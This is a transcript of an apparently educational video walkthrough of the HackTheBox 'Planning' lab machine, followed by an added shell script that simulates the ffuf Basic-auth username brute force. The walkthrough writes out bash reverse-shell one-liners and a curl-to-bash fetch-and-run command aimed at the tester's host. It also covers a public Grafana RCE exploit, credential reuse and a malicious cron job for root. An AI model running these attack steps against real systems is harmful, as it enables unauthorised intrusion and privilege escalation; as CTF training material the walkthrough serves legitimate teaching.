HackTheBox - Planning

IppSec · Beginner · DevOps & Cloud · 9mo ago

Key Takeaways

Discovers a vulnerable Grafana instance using gobuster and exploits it to gain remote code execution

Full Transcript

What's going on, YouTube? This is IppSec doing Planning from Hack The Box, which starts out with discovering that the homepage of this box isn't vulnerable to anything meaningful. But doing a virtual host scan, we can discover a subdomain that's hosting an out-of-date version of Grafana that has a public exploit that leads to remote code execution. We can get into this box and discover that we're in a container. Looking at the environment variables, we discover a password that lets us SSH into the box. From here, we discover a crontab.db file within /opt, which is a bit odd. Looking into it, it looks like it's part of the crontab-ui package, which is listening on localhost. Forwarding the port back to us and trying to access it, we discover it's protected with a username and password. Looking into the crontab.db file, we discover the password and then can brute force the username, which gets us into crontab-ui, where we can just get root by creating a malicious crontab. In the Beyond Root, we'll go over a little bit on some advanced cases with ffuf using encoders. So, with that being said, let's jump in.

As always, we're going to start off with an nmap: -sC for default scripts, -sV to enumerate versions, -vv for double verbose. This gives us things like the TTL. -oA to output all formats into the nmap directory and call it planning, and then the IP address of 10.10.11.68. This can take some time to run, so I've already run it. Looking at the results, we see just two ports open. The first one being SSH on port 22, and the server is an Ubuntu server. We also see HTTP on port 80, and its banner tells us it's nginx, also running on Ubuntu, and it's redirecting us over to planning.htb. So I'm going to go ahead and add this to my hosts file real quick: sudo vi /etc/hosts, and then we can say 10.10.11.68 planning.htb. Save that. And let's go take a look at what the page is. So I'm going to go over to my browser, http://planning.htb, and we get a page.
So the first thing I want to do is try to enumerate what type of page this is. If I just do a random 404 page, we get an nginx error message, so we can't pinpoint the framework. If we look at the page source, the next thing I'm looking for is like WordPress, Drupal, things like that at the top, and I don't really see anything. Let's see. We do have some .phps, so we know this is going to be a PHP website. So we could do a gobuster with the extension php and then find potential files. We could do a virtual host scan. We see a field here. I'm going to do a virtual host scan first, but I'd probably set up multiple of these if I was doing it on my own. But let's just do a gobuster, and then we'll do directory... oh, no, vhost. Wordlist: /opt/SecLists, DNS, or is it Discovery/DNS? Discovery/DNS. And then I don't like this next step, but I normally use one of these subdomains-top1million lists. The name we're looking for is only in this one. In hindsight, I probably should have made the subdomain a bit easier to find, but it's the name of a popular software thing. So maybe bitquark is a subdomain list we should be using, but it's one of my biggest gripes about this box. We can do -u http://planning.htb, and let's just make sure this starts off. And then while that goes, let's go ahead and play with this field, right? We have courses and a keyword. So if I do test and then search, we get nothing. There is something here, the courses page. It says check out new releases of our courses: web design for beginners, online marketing. I was hoping I could just copy that easily, but we'll just type web design. If we do web, we get nothing. Let's do web design for beginners. Get nothing. So I'm going to think this field doesn't really do anything. We're just getting blank search results every time. We could do like a single quote to see if we get an error message.
I'm just going to send this over to Burp Suite and play with this. And we do have the recon going on in the background. It has not found anything yet. Let's go ahead and turn that off and on. And then let's do test, search, and let's go back to Burp Suite for this. And let's see. I see 24112 bytes. So I'm just going to keep an eye on that, and that's how I'm going to know if the page changes, right? Because we're getting the whole index.php back, it's easy just to look at the size. So we put a single quote, it doesn't change; a double quote, it doesn't change; or 1=1, doesn't change. So I'm going to guess this is just broken, right? I think percent is normally a wildcard, so we can try this: a, e, i, o, u. And this never really changes. So I don't think we really have anything here. I'm just going to turn that off. Looking back at our results, we see it's only 12%. So while that runs, I'm also going to run a tool called nuclei to see if it picks up anything we are missing. So we can say nuclei -target http://planning.htb and kick this off. And whenever I kick off multiple enumeration tools, I like keeping an eye on it, at least at the start, to make sure we're not getting timeouts. I bet if we ran a second gobuster here, we may start seeing timeouts, which would be very bad because that means it's not fully testing an item, right? So while this goes, that looks like that's going fine. We see that planning.htb looks fine. So I'm just going to let these go and I'll come back if it finds anything.

So our virtual host enumeration is still going on, but nuclei has finished. So let's go take a look at what findings we have. The top here is just about SSH. We see the same banner we had in nmap. SSH is letting us log in with SSH keys or passwords. So this is also kind of good to know: if we have a password, we may want to try it because it is accepting password authentication. The banner is nginx.
And then for the actual web checks, we just have a bunch of missing headers. Right? If you just go report all these on a pen test or a bug bounty report, they'll probably start ignoring them just because they're used to seeing these. They don't exactly know how they're being exploited, right? It's the same way as if the server is vulnerable to an SSL vulnerability like BREACH and you just use that clickbait name: they'll be like, "Well, we've been vulnerable for years and never exploited, so why do we care?" Right? So if I was going to report this, I would look for the ones that I can demonstrate most. Maybe X-Frame-Options may be easy to demonstrate, because this is protecting against clickjacking attacks. So if you have this set, then the website won't be able to be displayed in an iframe. So maybe phishing, clickjacking, things like that, I may try demonstrating. It's probably the easiest because it just requires you standing up a resource on your own. If the website is also listening on HTTP, I may highlight that Strict-Transport-Security is missing, because this would then allow someone to man-in-the-middle the website for users if they're on the same network, maybe at like a Starbucks or some other coffee shop, or just places where they're on the same network. Not really that critical, because most websites don't listen on HTTP nowadays. But if it is listening on HTTP and HTTPS, I may highlight that and then I can show a demo, right? The Content-Security-Policy: this would be a key one I normally add on if they have cross-site scripting on their website, because all these headers are really a defense-in-depth methodology, right? So if you find cross-site scripting, you can't really do that much with it, but you can demonstrate that if they use Content Security Policy, then the cross-site scripting would be mitigated.
Or even better, if you use cross-site scripting, exploit something, and then show Content Security Policy would have prevented you from actually exploiting it, then this is a key one to flag and can also increase the severity, or also get you a double bug bounty thing, because you have a cross-site scripting vulnerability and you also demonstrate the impact of Content Security Policy. So technically you have two security-relevant bugs, right? So that's generally my approach to the security headers. Really not that big of a deal, but if you can show some type of exploitation, you may be able to get them to take it seriously, right?

So let's go take a look at our virtual host. And we're at 95% and it has not found anything. So I'm starting to think I did something wrong here. I'm just going to let this finish and get to 100. And I'm going to laugh if the word I'm looking for is in like position 98,000. But maybe I just chose the wrong wordlist. And again, this is one of the things I really don't like about this box. I wish we had on this page, as it gives you the credentials because it's assumed breach, but doesn't say the virtual host of the box. I wish we just put like "these credentials go to the subdomain.planning.htb". Right. So we have these credentials. We don't know exactly where they go. I'm hoping this virtual host finishes... and it did not find it. So I must have done something wrong. Let's go. http://planning... That looks right. Looking at this warning message though, it says the first subdomain doesn't contain a dot. You might want to append the base domain, otherwise the vhost will be tried as is. I'm going to add the --debug flag real quick. I think gobuster changed how it normally works. I swear in previous boxes it would just append the domain I put in the URL, but it doesn't look like it's doing that. Right. Based upon the error message, it said I need to use append-domain.
Let's try --append-domain (-ad) planning.htb. Okay, so I guess they have changed the syntax; my gobuster updated. When you use gobuster to do virtual host scanning, you want to use --append-domain to get it exactly how you want it. Odd behavior. Let's go ahead and run this again. And I'm going to pause the video and we'll resume when it is done. Hopefully this time it finds it. If not, then I'm going to be switching to ffuf, and I probably won't be using gobuster for DNS recon anymore, because that is definitely odd.

Okay. And there we go. That's much better. About 25% of the way through, we get grafana.planning.htb. So gobuster definitely did change that. And that's one of the good things about doing CTFs like Hack The Box: you know things are vulnerable. I'm sure if I was doing just pen testing full-time still, this change would happen and I would never really find out. I'd go through and miss a few virtual hosts just because I don't know something is supposed to be vulnerable and I don't test my toolsets. Doing CTFs like Hack The Box or just training things is a great way just to make sure your tools are working as you expect them to. Right? So let's go ahead and add this to our hosts file. So I'm going to do a sudo vi /etc/hosts and then we can add grafana.planning.htb. Save that and let's go access it. Right? So we do http://grafana.planning.htb and we get Grafana loaded, and it tells us the version is 11.0.0. Right, and also the account is admin and this password. So let's try logging in here. So I'm going to do admin and this, and we get logged into Grafana. Right. My first thing is always looking at like the changelog. So if we do "grafana changelog" and see if we can find out how old this version is. Release notes, Grafana documentation. Does this tell us? This is the latest, I'm guessing. Oh, wait. It looks like it will. Let's do 11.0. See, that doesn't work. I'm going to go to 8.5.0.
And then we just change this to be 11.0. Oh, do we get a 404? We do. Wonder if we just do release notes 11. Let's see. Grafana 11.0 release notes. And if we don't find the exact time, I normally don't spend too long on it. I just look at like the latest version. So it looks like maybe around May 19th, 2024. Another good one is just go to like CVE Details. This is probably also where I'd start. And then just type in the product. And we can see a bunch of vulnerabilities. I'm going to click on this just so we see them. And then let's go ahead and find one that looks juicy, right? 7.6 maybe. But I like normally looking for some type of red. We have this: the SQL Expressions experimental feature of Grafana allows evaluation of DuckDB queries. It doesn't tell us what version. We thought 11.0 was sometime in May 2024. So this comes out definitely after it. Why am I blocked? Let's see. Disable Burp Suite. Refresh. Okay. Websites can detect if you're using Burp Suite. I think it's based upon like the... I know it's not JARM because I think JARM is the fingerprint of the server, but essentially it fingerprints the encryption algorithms that you support, and that's how it identifies kind of what browser or what SSL thing you are using, and they probably have one for Burp Suite and they just think it's a bot. So maybe it's like a JA4S signature or something. I'm sure if you search around for JARM, J-A-R-M, you find it. But let's just go ahead and take a look at this. So we have this CVE, Grafana version 11.0. So it looks like it will be vulnerable. I'm just going to do this and then search GitHub to see if we have any proof of concepts. Advisory. Looks like a potential PoC. So let's go here. It is loading the GitHub page, and let's see: the PoC demonstrates SQL read and code execution. Can only happen on 11, but it looks like future versions may have a way to do file disclosure. This is using version 11.
So we should be able to get RCE. So I'm going to do a git clone on this. Let's go in here. python3 CVE... It uses the module... Let's just do a python3 -m venv venv, and we can do a source venv/bin/activate once this creates the virtual environment. venv/bin/activate, pip3 install -r requirements.txt to start installing these. And while that goes, let's see, we want to use -c. So we can do python3, user, pass, and then copy this. So let's do this. This will be grafana.planning.htb. I'm just going to run the shell command id to see if we have like command reflection. admin, password. Let's go back to here. Make sure we grab this. That paste was odd. I think that's fine. That looks it. Run it. And let's see. We have command execution, right? So since I'm putting this in here, what I'm going to do actually is let's do shell.sh, and we can say bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'. So if I try to put everything, like my whole command, in an argument, sometimes it's a little bit wonky, as in like there are special characters, things like that. If I do this, I should be able to just do a cat shell like this. And what this is going to do is... I don't know if that's actually going to work because this will create a... Yeah, that's not like that. That should work. Unrecognized argument. No. Put it in quotes. That's funny that it did id. I guess it just worked for my last command. We have an error message here. Syntax error, bash. So it doesn't like all those special characters. So actually, let's do a mkdir www, and then we'll copy shell.sh. Did I have it? Wait, what? Oh, shell is here. Go here. www. There we go. So my command, I'm just going to do /usr/bin/curl http://10.10.14.8:8000/shell.sh piped over to bash, like that. python3 -m http.server, and see if this works. It does. And we get the shell there. I'm curious if I tried to do this...
Let's try: if I didn't try to get fancy and put it in a file, would it have worked? Let's just do this real quick: /dev/tcp/10.10.14.8/9001 0>&1. Is this going to work? It does work. So you can do it either way. Sometimes I just don't like putting the reverse shell payload in an argument because sometimes it is processed poorly. I thought I could just do it as a file and then make it a bit easier, but that doesn't work, right? And I'm sure if I did this also, it won't work. Yeah, because what that does, it just passes in the temporary location of it, because what it's doing is running this command and then creating a fake file for it. At the end of the video, I think I can show this. I'm actually surprised this didn't work, but yeah, I don't know. So we do get a shell. Hopefully I didn't just confuse you. You can get a shell either way, right? I like doing the web cradle for two reasons. curl is probably going to work on a box. So if you get a hit from the curl to your web server, you know the server can reach out to the internet and things are working fine, right? And then if it fails to give you the shell, then you know something's blocking it. Maybe some type of firewall or something is just blocking the reverse shell from working. If you try to put everything in one payload, like that whole bash command, you don't know if the firewall blocked you. You don't know if you have bad characters in your payload. It just introduces a lot of unknowns, right? So that's why I like just breaking it up into multiple parts, because if it fails, I know, oh, it failed at this part. What did we introduce between this and the code execution? Okay, that's where it errored at, right? So breaking it into parts is very useful for troubleshooting, but it doesn't really matter since we showed both worked.
So let's see, we are definitely in a Docker container based upon this hostname. Right, if I do ls -la on /, we do see the .dockerenv. Let's look at what my environment looks like, and we see a password right here, "riot tech" and something, and the username is enzo. So if we cat /etc/passwd, we don't really see the enzo user because we're in the container. I'm going to check if enzo exists on the box, right? We did have nuclei tell us passwords could log in, and we have a password. So let's SSH to planning.htb, accept that, put in the password, and we get logged into the box. Awesome.

So the first thing I always like doing is just checking the sudo, because I have the password for this enzo user. I can't find any, or I can't run anything with sudo. So let's do a find. And we have a user.txt. So we could get the flag from here. There is a history file of less. And I think that may just be because I did not revert this box. Or not. We do have the file just being empty. It's probably pointed to /dev/null. Nope. It's just empty. So that is a little bit odd, but let's see what else could we do. We can do a ps -ef --forest to look at running processes on the box, and we see hidepid is enabled. Right? If I cat /etc/fstab, we see... let's see, where is it? Not there. /dev/disk, right here. The proc filesystem is mounted with hidepid=2, which hides processes running as other users. So we can only see what our user has access to. So let's see. I like also looking at the ports open on the box. So let's see. We have 80, which is the web server. We knew that. There's a port 8000 and 3000. Normally I'd look at the ps output and see if I can figure out what process is using what port, but we can't do that. So I'm going to go to the /etc directory, and we can do a grep -R 8000 2>/dev/null. And we see nothing. Let's try 3000. And we see grafana is in the nginx directory pointed there. Right?
You could also just do curls. So if we do a curl -i 127.0.0.1:3000, this is going to show us the headers. We find a 302 Found; it redirects us to /login. If we remember from our box, that's what Grafana did, but we could follow it. So if we just don't do that -i, let's do /login. We could probably find Grafana there, right? We don't know what 8000 is. If I send 8000, we just get an Unauthorized and it says Express. So we have a second web server here, right? And I know it's not using nginx, because I would have seen that in like the nginx config, right? When we did the grep for 3000, it found it in sites-enabled, and in this default there was a 3000 here, but nothing's passing us to 8000. So let's go /var/www. We have web. We could, let's see, look at index.php. We do have credentials here. So root and then this. So we can say su... can we log in? Because there is a database, right? grep everything that ends in sh in /etc/passwd. No other users. Let's go back to this index. localhost, mysql -u root -p, put in that password, and then let's see: show databases; use educate; show tables; select * from courses; it's empty, which isn't a surprise, because when we were using that search functionality of the web page it was all empty, and it doesn't really look like anything interesting there. So let's see. What else do we have? Another place that's common to run websites is the /opt directory. And we have an /opt/crontabs. So if I look at crontabs, we do have a crontab.db. If I just cat this, we have some entries, right? Grafana backup, /usr/bin/docker. Let's see. Maybe it's just easy if I copy this. vi crontabs.json, because this looks like JSON data. cat this | jq . There we go, easier to view. So we can see two crons running. We have cleanup.sh running, and it looks like it runs every single minute. And then this Docker one runs daily.
We can't really run ps to identify what cleanup.sh is doing, because that hidepid=2 is on the box. So we can't like just see running processes. So that may make cleanup really hard to investigate. One thing I also like doing: if we go to /etc/systemd, we can list all the services on the box. So I'm just going to do find with -type f. And let's see, systemd-resolved is this year. We also have this crontab-ui of February 28th. So this is probably going to be related to that crontab file, right? We can't read this file, but I'm guessing inside of this file is going to be listen on port 8000, and it probably has some type of credentials or something, right? So let's see. If we look at this crontab-ui GitHub, we'll probably be able to find it's open source. And we could search this for default configurations. Unfortunately, I don't think it has one for username and password, but this looks like it is probably the application and it passes things in an environment variable. So let's go ahead and just forward this port back to us. So, oh, and looking at it, we do have a password here. So in this command, we have the password, S0 riot 3C. If we try to su with it, does not look like it works. So what I'm going to do is, if the first thing on a line you type is ~C, it should drop you in this interactive prompt. And I'm going to listen on port... we'll do 8001 because my web server is already listening on port 8000, and we're forwarding to 127.0.0.1:8000. So anything on my box on port 8001 is going to be forwarded through that SSH connection, and it's going to go to port 8000 on localhost. So we can test that by doing 127.0.0.1:8001, and we get the same thing we saw with that curl, a login page, right? So I'm going to try admin and then the password; enzo, the password; root, the password, and it lets us log in. So we have access to this crontab-ui. I'm going to click New for a new crontab.
And I'm going to say shell, and the command I'll do is bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1', like that. Let's make sure we are listening on 9001. Save this. I'm going to click Run Now. Yes to run the cron. And did I typo something? bash -c 'bash -i >& /dev/tcp/10.10.14.8/...'. Okay, there we go. We have a shell. I guess it just took a second. So if I do cd /root, we can get root.txt.

One thing I don't like is manually trying a bunch of usernames for a login, right? And a lot of tools just do the login brute force. Like Hydra makes this really easy. It's a pretty old tool, not really updated anymore, but I figured this is a good thing to show the ffuf encoders, right? Because we could do this ourselves. And I think it's a good learning opportunity. So let's just say we didn't know this password. How do I log out? Is there a log out? I guess we can go to cookies, cache, storage, IndexedDB, local storage, delete all, delete session, refresh. New private... I don't have Burp Suite here. Clear data, history. Did you forget... There we go. Awesome. So it's asking us to sign in again. So I'm going to send this over to Burp Suite. Refresh. And we'll say ipsec, password. And let's make sure we are intercepting. Sign in. And we have the login form here. So HTTP authentication, it does Basic. And then this is base64 encoded. We can see it decoded. It puts the username, colon, the password. So what I'm going to do is copy this request to a file. And I'm going to call this login.request. And then we can edit this. And what I'm going to do is put ffuf here, because this is going to be the piece we want to edit, right? So we can do a ffuf -request login. We want to say the protocol is HTTP because it defaults to HTTPS. And then the wordlist. Let's create a custom wordlist. So we do vi users.txt. We'll say ipsec, admin, enzo, root, please subscribe, encoders for the win. Sure, that's fine. So if we say users.txt and then I think that's all we need. login. Let's see. -request, -request-proto.
I kind of expected to see lines. Let's see. Match all responses. Let's see. Match code. So we can say -mc all. Is that going to show me everything? Status 401. I was kind of hoping... Is it FUZZ? Okay. FUZZ, not ffuf. There we go. We see it attempting each one of these, right? So what we have to do is put our username, colon, the password, and base64 encode it. So I'm going to use that thing we showed earlier in the video. So I'm going to do this. And what this is going to do is create a temporary file. So I'm going to do a sed, and I'm going to search for a line break, which is a dollar sign, and then I'm going to replace it with a colon. Not that. Let's go back. Where is it? Right here. Right. users.txt. So sed, search for line break, and then replace it with colon and the password. We saw that here, right? I was in /opt/crontabs/crontab.db. Okay. So we do this, and we need to specify the file users.txt. There we go. So what we have done is put a username, colon, the password for every line. Right? If you don't know exactly how this works, again, it runs this command, creates a temporary file. So when something reads that temporary file, it does that, right? I can kind of show that if we do echo this, it's /dev/fd/63. So if I catted that file descriptor, we get the results, right? And my users.txt is still this. So what we want to do now is use the encoder. So ffuf has encoders. So we could like URL encode something. We can base64 encode. We want a base64 encode. So we'll do -enc, and then we specify what our replacement character is, right? And then in login.request the replacement is FUZZ. So I'm going to do encoder FUZZ and then colon b64encode. So that's going to say every word... this is base64 encoded after you do the wordlist replacement. And there we have it. We have this, and we see 401, 401, 401, 200. So we could have also done a filter code 401, so it hides all that. And then we only get this as the result.
And then if we echo this and base64 decode it, we get the username. So that's how you could do a username brute force with ffuf. It's probably much easier just to use Hydra. But if you wanted to go the hard way and just use ffuf because you know ffuf well, that's how you could do it. So hopefully I didn't really confuse you going crazy and doing things this way. Yeah. So take care and I will see you all next
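The username brute force at the end of the video, reproduced offline as an added example (this is not the video's own code or crontab-ui's). HTTP Basic authentication sends `Authorization: Basic base64("user:password")`, so with a known password and unknown username the wordlist has to become `user:password` per line and then be base64-encoded per entry. In the video that is a process substitution (`-w <(sed "s/\$/:password/" users.txt)`) plus ffuf's `-enc FUZZ:b64encode`, with `-fc 401` to hide the failures; here both steps are plain POSIX shell, and the crontab-ui server is replaced by a stand-in function that accepts exactly one token. The candidate users, the password `s3cret` and the matching user `enzo` are constructed for the example and are not the box's real values.

```sh
#!/bin/sh
# Added example: the "user:password" -> base64 -> Basic-auth brute force from
# the video, without a live target.  Nothing here is from crontab-ui or ffuf.

# Constructed wordlist and password (not the real values from the box).
USERS='ipsec
admin
enzo
root'
PASS='s3cret'

# base64("user:pass") with no newline inside the encoded data, i.e. exactly
# the token a browser puts after "Authorization: Basic ".
basic_auth_token() {
    printf '%s:%s' "$1" "$2" | base64 | tr -d '\n'
}

# The sed step from the video: replace end-of-line ($) with ":password",
# turning a one-user-per-line list (stdin) into one "user:password" per line.
# NOTE: a password containing '/' or '&' would need escaping for sed.
append_password() {
    sed "s/\$/:$1/"
}

# What ffuf's -enc FUZZ:b64encode does to every wordlist entry on stdin.
encode_lines() {
    while IFS= read -r line; do
        printf '%s' "$line" | base64 | tr -d '\n'
        printf '\n'
    done
}

# Decode a token back to just the username (the final step in the video).
decode_user() {
    printf '%s' "$1" | base64 -d | cut -d: -f1
}

# Stand-in for the crontab-ui login: one token gets 200, everything else 401.
# ASSUMPTION: the real Express basic-auth middleware decodes the token and
# compares user and password separately; for a correct pair the result is
# the same, so comparing whole tokens is enough for the demonstration.
EXPECTED_TOKEN="$(basic_auth_token enzo "$PASS")"
fake_server_status() {
    [ "$1" = "$EXPECTED_TOKEN" ] && echo 200 || echo 401
}

# The whole ffuf run: build user:pass lines, encode each, "send" it, keep the
# one response that is not 401 (ffuf -fc 401) and decode it to the username.
# Prints the username on success; returns 1 when no candidate matched.
find_user() {
    user="$(printf '%s\n' "$1" | append_password "$2" | encode_lines |
        while IFS= read -r token; do
            if [ "$(fake_server_status "$token")" = 200 ]; then
                decode_user "$token"
                break
            fi
        done)"
    [ -n "$user" ] && printf '%s\n' "$user"
}

main() {
    echo "header the server expects: Authorization: Basic $EXPECTED_TOKEN"
    echo "wordlist ffuf would read after the sed step:"
    printf '%s\n' "$USERS" | append_password "$PASS"
    echo "recovered username: $(find_user "$USERS" "$PASS")"
}

main
```

Running it prints the `user:s3cret` lines and then `recovered username: enzo`. Process substitution (`<(...)`) is a bash feature, which is why the block pipes through `append_password` instead; against a real target the same three stages map onto `sed`, `-enc FUZZ:b64encode` and `-fc 401` exactly as shown in the video.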

Original Description

00:00 - Introduction
01:00 - Start of nmap
02:40 - Using gobuster to discover the VHOST and running into a minor issue, I think gobuster changed how it handles the domain on VHOST Scans.
06:00 - Looking at the Nuclei Results
09:40 - Using the append-domain (ad) flag in gobuster to allow our VHOST scan to work and discovering the Grafana subdomain
12:00 - Discovering Grafana is running 11.0.0 and searching CVE's
13:40 - Finding CVE-2024-9264, and running it to get a shell on the Grafana docker container
21:00 - Looking at the env variables, discovering a credential that works to SSH into the box
25:50 - Looking at the crontab.db file, discovering a password
27:50 - Forwarding localhost:8000 back to us, so we can hit crontab-ui and logging in and creating a malicious cron to get root
29:35 - Showcasing FFUF to bruteforce HTTP Login by using bashful to append a string to our fuzz list and also use an encoder to b64 encode